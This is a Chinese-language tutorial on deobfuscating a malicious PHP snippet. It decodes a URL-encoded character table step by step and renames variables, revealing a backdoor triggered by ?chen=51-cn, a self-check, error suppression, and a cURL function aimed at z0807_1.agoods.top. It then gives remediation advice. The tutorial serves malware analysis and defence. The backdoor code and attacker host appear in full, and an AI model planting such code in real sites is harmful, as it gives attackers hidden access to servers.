引言:理解PHP代码混淆与去混淆的必要性
在web开发和系统维护中,我们有时会遇到难以理解的php代码,这些代码可能经过混淆处理。代码混淆是一种有意使代码难以阅读和理解的技术,其目的通常是保护知识产权或隐藏恶意行为。对于服务器上发现的异常或未知代码,进行去混淆是分析其功能、识别潜在威胁(如后门、恶意注入)的关键步骤。本教程将通过一个具体的php代码示例,详细演示去混淆的整个过程,并分析其潜在的恶意意图。
一、识别混淆特征
在开始去混淆之前,首先要识别代码中的混淆特征。常见的PHP混淆手段包括:
- 使用eval()、base64_decode()、gzinflate()等函数组合加密字符串。
- 将字符串拆分成字符数组或通过索引访问字符来构造。
- 使用大量无意义的、重复的或难以阅读的变量名和函数名。
- 通过URL编码、十六进制编码等方式隐藏字符串。
我们提供的示例代码中,主要使用了URL编码和通过索引访问长字符串的方式来混淆。
<?php
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
// ... 更多代码 ...可以看到,$OOOOOO是一个URL编码的字符串,随后被urldecode()解码并赋值给$O。接下来的代码中,大量使用了$O{x}(PHP中已弃用的字符串按索引访问语法)来构建新的字符串。
二、逐步去混淆过程
去混淆是一个迭代和细致的过程,需要耐心和逻辑分析。
立即学习“PHP免费学习笔记(深入)”;
2.1 解码核心字符映射表
首先,我们需要解码$OOOOOO变量。 原始代码: $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";$O=urldecode($OOOOOO);
通过执行urldecode($OOOOOO),我们可以得到$O的实际内容:
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";这个字符串包含了键盘上的字符,以及一些特殊符号,是后续字符拼接的基础。
2.2 替换字符索引访问
接下来,代码中大量使用$O{索引}的方式来获取字符。我们需要将这些表达式替换为实际的字符。例如,$O{21}代表索引为21的字符,即c。 原始代码片段: if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
替换后: if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
对所有出现$O{x}的地方进行替换,得到如下代码:
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "["."o"."k"."!"."]";
exit;
}else{
echo "["."f"."a"."i"."l"."!"."]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}2.3 合并字符串字面量
上一步得到的代码中,许多字符串是通过.运算符拼接的。为了提高可读性,可以将这些拼接的字符串合并成一个完整的字符串。 例如:"c"."h"."e"."n" 变为 "chen"。
if($_GET["chen"]=="51-cn"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}2.4 重命名混淆变量和函数
代码中使用了大量无意义的变量名(如$oooOoOoOoooOooOOooooo)和函数名(如ooooooooOOOOOOOOoooooOOO)。为提高可读性,根据其用途赋予有意义的名称。
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__); // 获取当前文件内容
$parts = explode("<?php",$thisFileSource); // 按"<?php"分割文件内容
if(strpos($parts[1],'%71%77%65')!==false){ // 检查第二部分是否包含特定URL编码字符串
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$subdomain='z0807_1'; // 子域名片段
$url="http://".$subdomain.".agoods.top"; // 构造完整URL
function sendRequest($targetUrl){ // 定义一个发送HTTP请求的函数
$curlHandle=curl_init();
curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl);
curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec($curlHandle);
curl_close($curlHandle);
return $result;
}2.5 代码格式化和清理
最后,对代码进行格式化,包括拆分过长的行、调整缩进等,使其更符合编程规范,进一步提升可读性。
<?php
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); // 禁用所有错误报告
// 核心字符映射表,用于构建其他字符串
// $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";
// 检查URL查询参数,如果$_GET["chen"]的值为"51-cn",则执行后续逻辑
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__); // 读取当前PHP文件的全部内容
// 将文件内容按"<?php"分割。通常,恶意代码会注入到现有PHP文件的末尾或中间。
// 如果文件中有多个"<?php"标记,这里会将其分割成多个部分。
$parts = explode("<?php",$thisFileSource);
// 检查第二个部分(即第一个"<?php"标记之后的内容)是否包含特定的URL编码字符串。
// '%71%77%65' 对应 'qwe' 的URL编码。这可能是恶意代码自身特征的检查。
if(strpos($parts[1],'%71%77%65') !== false){
echo "[ok!]"; // 如果包含,输出"[ok!]"
exit;
}else{
echo "[fail!]"; // 否则,输出"[fail!]"
exit;
}
}
$subdomain = 'z0807_1'; // 定义一个子域名片段
// 构造一个完整的外部URL,指向 'http://z0807_1.agoods.top'
$externalUrl = "http://".$subdomain.".agoods.top";
/**
* 发送HTTP GET请求到指定URL的函数
* @param string $targetUrl 目标URL
* @return string 请求结果或false
*/
function sendRequest($targetUrl){
$curlHandle = curl_init(); // 初始化cURL会话
curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl); // 设置请求URL
curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1); // 设置将curl_exec()获取的信息以字符串返回,而不是直接输出
curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5); // 设置连接超时时间为5秒
$result = curl_exec($curlHandle); // 执行cURL请求
curl_close($curlHandle); // 关闭cURL会话
return $result; // 返回请求结果
}
// 注意:在此代码片段中,sendRequest 函数虽然被定义,但并未被调用。
// 这可能意味着它在代码的其他部分被调用,或者是一个未完成的恶意功能。三、去混淆代码分析与潜在威胁识别
经过去混淆和重命名后,代码的真实意图变得清晰:
-
错误抑制与字符映射表:
- error_reporting(0); 禁用所有错误报告,这是恶意代码的常见做法,用于隐藏其执行过程中可能产生的错误,避免引起管理员注意。
- $O 变量作为字符映射表,是所有混淆字符串的源头。
-
后门入口与自检机制:
- if($_GET["chen"]=="51-cn"):这部分代码创建了一个简单的后门入口。如果通过URL参数 ?chen=51-cn 访问该文件,则触发后续逻辑。
- 自检逻辑: file_get_contents(__FILE__); 读取当前文件内容,然后通过 explode("<?php", $thisFileSource) 分割。
- if(strpos($parts[1],'%71%77%65') !== false):检查第二个PHP代码块(即第一个<?php之后的部分)是否包含URL编码的'qwe'。这可能是一个简单的自检机制,用于确认恶意代码是否完整或已被篡改。如果通过,输出[ok!],否则输出[fail!]。这个自检功能本身看起来用途不大,因为如果代码不存在,它就不会运行。它更像是一个简单的验证机制,确保其注入的代码还在。
-
外部通信函数:
- $externalUrl = "http://".$subdomain.".agoods.top";:代码构造了一个指向 http://z0807_1.agoods.top 的URL。
- sendRequest($targetUrl) 函数:这是一个标准的cURL函数,用于向外部URL发送HTTP请求并获取响应。
关键发现与潜在威胁:
- 未执行的外部请求: 在提供的代码片段中,sendRequest 函数虽然被定义,但并未被调用。这意味着攻击者可能在文件的其他位置注入了代码来调用此函数,或者此代码只是一个更大恶意框架的一部分,等待其他模块来激活。
- agoods.top 域名: 对agoods.top域名的查询通常会揭示其与恶意活动(如网站劫持、恶意重定向、钓鱼页面)的关联。许多受感染的网站会将内容从这类域名加载或重定向用户。代码中连接此域名,表明其可能旨在从攻击者的服务器下载更多恶意负载、指令,或者将受害者数据发送回攻击者。
- 恶意后门: 整个脚本看起来像是一个简单的PHP后门,允许攻击者通过特定的URL参数触发一些内部检查,并预留了与外部恶意服务器通信的能力。
四、安全建议与防范措施
面对此类混淆的恶意PHP代码,应采取以下措施:
- 立即隔离和清除: 将受感染的文件从服务器上隔离,并清除所有被注入的恶意代码。务必进行彻底的文件系统扫描,查找其他可能被篡改的文件。
-
溯源分析: 检查服务器日志(Web服务器日志、PHP错误日志等),尝试找出恶意代码是如何被注入的。常见途径包括:
- 过时的CMS(WordPress, Joomla等)或插件漏洞。
- 弱密码或被泄露的FTP/SSH凭据。
- 不安全的服务器配置。
- 更新和加固:
-
定期备份和监控:
- 定期进行全站备份,以便在发生安全事件时能够快速恢复。
- 实施文件完整性监控(FIM),及时发现文件被修改的异常情况。
- 监控网络流量,识别异常的外部连接。
- 代码审计: 对于自行开发的应用程序,定期进行代码审计,查找潜在的安全漏洞。
总结
去混淆是理解和对抗恶意代码的重要技能。通过本教程的步骤,我们不仅成功地将一段高度混淆的PHP代码还原为可读形式,还深入分析了其作为潜在后门和外部通信工具的恶意意图。识别、分析并清除此类恶意代码,结合全面的安全加固措施,是维护网站和服务器安全的关键。
